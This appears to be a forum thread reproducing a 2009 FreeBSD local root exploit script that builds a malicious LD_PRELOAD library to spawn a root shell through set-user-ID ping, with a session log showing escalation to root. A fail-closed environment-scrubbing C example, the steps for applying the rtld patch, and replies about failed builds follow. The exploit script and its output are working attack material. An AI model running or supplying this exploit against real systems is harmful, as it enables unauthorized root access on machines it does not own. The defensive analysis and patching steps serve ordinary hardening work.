Tried it on my own machine.
cat ./w00t.sh
#!/bin/sh
echo ** FreeBSD local r00t zeroday   # unquoted ** is expanded by the shell, hence the file listing in the output below
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>   /* the angle-bracketed header name was lost in the page's HTML; restored here */
main() {
extern char **environ;
environ = (char**)malloc(8096);   /* hand-built environment array */
environ[0] = (char*)malloc(1024); /* entry 0 is never filled in: no NAME=VALUE form, which is what libc later reports as "environment corrupt" */
environ[1] = (char*)malloc(1024);
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");
execl("/sbin/ping", "ping", 0);  /* set-user-ID binary; rtld is supposed to drop LD_PRELOAD before loading it */
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>   /* these four header names were stripped by the page's HTML; restored here */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void _init() {
extern char **environ;
environ=NULL;
system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env
$ uname -v
FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:48:17 UTC 2009 root@almeida.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
$ whoami
denn
$ ./w00t.sh
dev env env.c nginx.conf php5-fpm program.c program.o w00t.sh w00t.so.1.0 FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# whoami
root
#
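The repeated "environment corrupt; missing value for" lines in the session above are libc complaining that an environment entry contains no '=' (the empty entry 0 built by env.c). rtld's attempt to unsetenv() LD_PRELOAD for the set-user-ID ping failed on that entry, and the unpatched rtld ignored the failure and loaded the library anyway. The C below is an added example, not code from this post or from FreeBSD: a fail-closed scrubbing routine that refuses a malformed environment outright instead of trusting a half-cleaned one, run over constructed sample environments. The UNSAFE_VARS list and all function names are assumptions made for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Names an untrusted caller must not be able to pass into a set-user-ID
   process. Assumed list for this example; FreeBSD's rtld keeps its own. */
static const char *const UNSAFE_VARS[] = { "LD_PRELOAD", "LD_LIBRARY_PATH", "LD_LIBMAP" };
#define N_UNSAFE (sizeof UNSAFE_VARS / sizeof UNSAFE_VARS[0])

/* Returns 0 if every entry has the form NAME=VALUE with a non-empty NAME,
   -1 otherwise. An entry without '=' is exactly the condition libc reports
   as "environment corrupt; missing value for", and it makes unsetenv() fail. */
int env_is_well_formed(char *const *env)
{
    for (size_t i = 0; env[i] != NULL; i++) {
        const char *eq = strchr(env[i], '=');
        if (eq == NULL || eq == env[i])
            return -1;
    }
    return 0;
}

/* Returns 1 if NAME is present as "NAME=...", else 0. */
int env_contains(char *const *env, const char *name)
{
    size_t n = strlen(name);
    for (size_t i = 0; env[i] != NULL; i++)
        if (strncmp(env[i], name, n) == 0 && env[i][n] == '=')
            return 1;
    return 0;
}

/* Removes the unsafe names in place, compacting the array.
   Fails closed: a malformed environment is rejected with -1 before anything
   is trusted, which is the behaviour the rtld patch adopts (abort instead of
   ignoring a failed unsetenv). Otherwise returns the number of entries removed. */
int scrub_unsafe_env(char **env)
{
    if (env_is_well_formed(env) != 0)
        return -1;
    int removed = 0;
    size_t out = 0;
    for (size_t i = 0; env[i] != NULL; i++) {
        int unsafe = 0;
        for (size_t k = 0; k < N_UNSAFE; k++) {
            size_t n = strlen(UNSAFE_VARS[k]);
            if (strncmp(env[i], UNSAFE_VARS[k], n) == 0 && env[i][n] == '=') {
                unsafe = 1;
                break;
            }
        }
        if (unsafe)
            removed++;
        else
            env[out++] = env[i];
    }
    env[out] = NULL;
    return removed;
}

/* Constructed sample shaped like the environment env.c builds: entry 0 is an
   empty string (no '='), entry 1 carries LD_PRELOAD. Returns the scrub result. */
int demo_corrupt_env(void)
{
    char *env[] = { "", "LD_PRELOAD=/tmp/w00t.so.1.0", NULL };
    int rc = scrub_unsafe_env(env);
    printf("corrupt env: scrub returned %d, LD_PRELOAD still present: %d\n",
           rc, env_contains(env, "LD_PRELOAD"));
    return rc;  /* -1: the caller must abort rather than run the set-uid image */
}

/* Constructed well-formed sample: LD_PRELOAD is dropped, everything else kept. */
int demo_clean_env(void)
{
    char *env[] = { "PATH=/bin:/usr/bin", "LD_PRELOAD=/tmp/w00t.so.1.0", "HOME=/home/denn", NULL };
    int removed = scrub_unsafe_env(env);
    printf("well-formed env: removed %d, LD_PRELOAD present: %d, HOME present: %d\n",
           removed, env_contains(env, "LD_PRELOAD"), env_contains(env, "HOME"));
    return removed;  /* 1 */
}

int main(void)
{
    demo_corrupt_env();
    demo_clean_env();
    return 0;
}
```

Build with `cc scrub.c -o scrub` and run `./scrub`. The design point is the return-value check: unsetenv() reporting failure on a corrupt environment is a signal that the caller cannot know what else is still set, so the only safe response for a privileged loader is to stop, which is what the one-hunk rtld.patch fetched below does.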
Applying the patch to close the hole:
fetch http://people.freebsd.org/~cperciva/rtld.patch
rtld.patch 100% of 846 B 960 kBps
# cd /usr/src/libexec/rtld-elf/
# patch -p0 < /home/denn/rtld.patch
Hmm... Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|Index: rtld.c
|===================================================================
|--- rtld.c (revision 199977)
|+++ rtld.c (working copy)
--------------------------
Patching file rtld.c using Plan A...
Hunk #1 succeeded at 366.
done
make && make install

[tmjn@laptop ~]$ sh 00.sh
00.sh FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c:1:10: error: #include expects "FILENAME" or <FILENAME>
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function 'execl'
program.c:1:10: error: #include expects "FILENAME" or <FILENAME>
program.c:2:10: error: #include expects "FILENAME" or <FILENAME>
program.c:3:10: error: #include expects "FILENAME" or <FILENAME>
program.c:4:10: error: #include expects "FILENAME" or <FILENAME>
program.c: In function '_init':
program.c:8: error: 'NULL' undeclared (first use in this function)
program.c:8: error: (Each undeclared identifier is reported only once
program.c:8: error: for each function it appears in.)
gcc: program.o: No such file or directory
cp: w00t.so.1.0: No such file or directory
00.sh: ./env: not found
[tmjn@laptop ~]$ whoami
tmjn
and nothing was patched, freshly installed system
But it's my brain that needs patching :( Sorry, I'm grumpy today...

The general C syntax sort of implies something like:
#include <stdio.h>
Is it really that hard to fix the protection against script-kiddie schoolkids? =
chmod +x ./w00t.sh

By the way you have version 8.1, I think it is already patched